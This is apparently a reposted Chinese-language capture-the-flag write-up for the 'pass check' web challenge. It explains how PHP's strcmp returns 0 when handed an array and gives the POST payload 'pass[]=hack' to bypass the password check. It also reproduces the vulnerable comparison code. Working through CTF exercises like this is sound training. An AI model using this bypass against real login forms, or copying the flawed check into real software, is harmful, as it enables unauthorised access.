CG CTF WEB pass check
生活随笔
收集整理的這篇文章主要介紹了
CG CTF WEB pass check
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
http://chinalover.sinaapp.com/web21/
原理:
php的弱類型漏洞
strcmp函數(shù)接受到了不符合的類型,strcmp函數(shù)將發(fā)生錯誤,顯示了報錯的警告信息后,將?return 0。
版本一
題解:抓包
工具:Burp Suite
步驟:
$pass=@$_POST['pass']; $pass1=***********;//被隱藏起來的密碼 if(isset($pass)) { if(@!strcmp($pass,$pass1)){ echo "flag:nctf{*}"; }else{ echo "the pass is wrong!"; } }else{ echo "please input pass!"; } ?>審查元素
修改HTML
<html> <head> </head> <body>please input pass! <form action="index.php" method="post"><input type="text" name="pass"><input type="submit" name="提交"> </form> </body> </html>隨便提交一個數(shù)據(jù)
并且抓包
右鍵
修改數(shù)據(jù)
GO
版本二
工具:火狐瀏覽器插件hackbar
步驟:
$pass=@$_POST['pass']; $pass1=***********;//被隱藏起來的密碼 if(isset($pass)) { if(@!strcmp($pass,$pass1)){ echo "flag:nctf{*}"; }else{ echo "the pass is wrong!"; } }else{ echo "please input pass!"; } ?>hackbar POST 數(shù)據(jù)?
pass[]=hack參考文章:
總結(jié)
以上是生活随笔為你收集整理的CG CTF WEB pass check的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [NOI2011]阿狸的打字机
- 下一篇: CG CTF WEB 起名字真难